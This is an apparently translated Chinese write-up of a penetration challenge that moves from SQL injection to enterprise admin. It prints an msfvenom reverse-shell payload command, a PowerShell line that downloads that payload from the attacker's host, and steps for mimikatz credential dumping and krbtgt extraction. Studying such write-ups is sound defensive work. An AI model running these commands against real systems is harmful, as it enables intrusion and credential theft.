本文讲的是渗透挑战赛:从SQL注入到管理员权限,
在本文中,Sudhanshu Chauhan探索了一条利用SQL注入漏洞获取Windows企业管理员权限的开发路径。读到这你可能会想Sudhanshu 用的是哪种方法呢?OSINT、弱凭据、密码破解、不安全配置、跳板攻击(Pivoting)、绕过杀毒软件或pwnage。
要说明的是,从SQL注入到管理员权限是Sudhanshu在参加一个黑客挑战比赛时的一个项目,而且挑战的前提是,他只知道攻击企业的名称。另外,在比赛的初始阶段是禁止进行采用枚举的,所以一开始只能被动收集信息,其中包括识别客户拥有的IP范围,枚举域和子域,探索github、pastebin和其他消息来源,使用shodan以及其他一些OSINT技术来发现泄漏的敏感信息和服务。
一份资源列表可以根据许多因素进行了编辑和排名,其中包括泄露的证书、过时的软件、暴露的服务等,Sudhanshu认为透过这些目标会产生很多有用的信息,并确认下一阶段的挑战方案。
其中一个排名靠前的网站被发现有一个SQL注入漏洞,在SQLMap中使用选项“- is- dba”,Sudhanshu发现他竟有数据库管理员级别的特权。交互式访问(sql shell)是从多个数据库被识别的地方获得的,另外,还设置了一些数据库用户帐户和相关的密码哈希。使用# OneRuleToRuleThemAllSudhanshu能够破解一些哈希密码。另外,由于在数据库服务器上启用了“xp_cmdshell”,因此Sudhanshu能够执行操作系统命令。这证实了OOB(out of band) DNS调用了Sudhanshu的自定义域“xyz.abc.sos.notsosecure.com”,如下所示:
当你有代码执行时,下一步是通过交互式shell实现更好的控制。Sudhanshu处理了多个meterpreter有效载荷,但几乎都失败了。当Sudhanshu不断尝试使用多个渗透技术(如ICMP tunnelling)时,它通过xp_cmdshell解决了一个交互式ICMP shell,如下所示:
使用新获得的ICMP外壳,Sudhanshu处理了被破坏的系统,并四处寻找在开发后可以帮助Sudhanshu的任何东西。ICMP的外壳也有点不稳定,不足以解渴Sudhanshu的解渴。
当目标的主机使用Windows框架时,Sudhanshu尝试得到一个powershell meterpreter有效载荷。它给了Sudhanshu一个shell,但在几秒钟内就被检测到了,连接被终止。通过枚举,可以确认企业的主机上运行的是什么杀毒软件。在几次试图绕过安全保护失败后, Sudhanshu又返回到了主机上的枚举,并确定安装了python。然后Sudhanshu通过运行以下命令生成了一个使用msfvenom的python meterpreter有效载荷:
msfvenom -f raw -p python/meterpreter/reverse_tcp LHOST=<OUR_HOST> LPORT=1234 > pypreter.py
上面的载荷是在Sudhanshu的服务器上托管的,Sudhanshu会指示受损服务器从ICMP shell中使用以下Powershell命令下载有效载荷:
powershell $WebRequest = New-Object System.Net.WebClient; $WebRequest.DownloadFile('http://<OUR_HOST>:8000/pypreter.py','C:WindowsTemppypreter.py')
Sudhanshu为python载荷启动了metasploit多处理器,并通过ICMP shell执行了载荷。这给Sudhanshu带来了想要的meterpreter shell,如下所示:
虽然比Sudhanshu最初的ICMP shell要稳定的多,但大多数meterpreter命令都没有获得预期的结果,这是因为python的meterpreter实现的局限性。
从Sudhanshu新获得的python meterpreter shell中,Sudhanshu继续进行了进一步的枚举。基于过去的经验,Sudhanshu针对网络共享,因为它们通常不包含在杀毒扫描范围内。幸运的是,Sudhanshu偶然发现了一个这样的共享,并在那里删除了一个Windows非阶段性的meterpreter有效载荷。于是,Sudhanshu开始了另一个metasploit的多处理器,用于非阶段性的meterpreter有效载荷,执行二进制,并且期望得到一个新的本地meterpreter shell。
一旦你有了一个meterpreter shell,就代表着挑战即将成功。现在Sudhanshu不再使用哈希,试图用mimikatz提取明文密码,提取委托令牌。但结果并不理想,还是没有发现任何一个明文登录凭证,因为没有人用它进行登录,本地的哈希也没有在其他地方运行过。
Sudhanshu发现主机有多个网络接口,因此Sudhanshu使用新获得的meterpreter shell向内部网络添加了一个route命令,route命令如下所示:
route add 10.0.1.0 255.255.252.0 1
在添加了route命令之后,Sudhanshu执行了ARP扫描,并使用一个post exploitation metasploit模块来识别网络上的当时的连接主机。
然后,Sudhanshu使用auxiliary metasploit模块对当时连接的主机执行端口扫描,以尝试识别运行MSSQL的主机,如下所示:
然后,Sudhanshu使用了“auxiliary/scanner/mssql/mssql_login”模块与数据库账号,查看是否有任何账户被重用,如下所示:
此时,Sudhanshu发现一个帐户在另外两个主机上有效,并具有数据库管理特权。在‘auxiliary/admin/mssql/mssql_exec’ 模块的帮助下, Sudhanshu可以使用这个特权帐户得到类似系统的meterpreter shell运行。这个主机运行的是Windows Server 2003操作系统。本地的哈希随后就被清除了,同时Hashcat也会破解了一些本地的账户。然后将meterpreter shell被用于转储域帐户哈希,如下所示:
除此之外,mimikatz还被用来从被破坏的盒子里清除清晰的文本密码,如下图所示:
经过进一步的枚举之后,可以确定其中一个用户属于“企业管理员”身份,这让Sudhanshu可以直接访问域控制器。此时,Sudhanshu进行了大规模开发,并使用这些高权限凭据,Sudhanshu使用powershell脚本“invoke – massmimikatz.ps1”从所有其他主机中提取出多个明文密码。
此外,Sudhanshu现在可以在域控制器上执行哈希转储,以获得诸如“krbtgt”之类的高级特权帐户的哈希。在本文中,Sudhanshu使用了一个名为“dcsync_ntlm”的nifty命令从metasploit kiwi扩展中提取krbtgt帐户的哈希,如下所示。
然后可以进一步利用这个哈希来创建黄金票证,并在网络上获得持久性。
这样挑战就此结束,回顾一下整个挑战,从web应用程序漏洞开始,到获取企业管理员的多个凭据。整个攻击流程图如下所示:
所以,对于企业来说,确保网络安全的重要方面就是确保所有系统都创建了完整的库存,并且对保护措施及时进行升级。
原文发布时间为:2017年9月17日
本文作者:luochicun
本文来自合作伙伴嘶吼,了解相关信息可以关注嘶吼网站。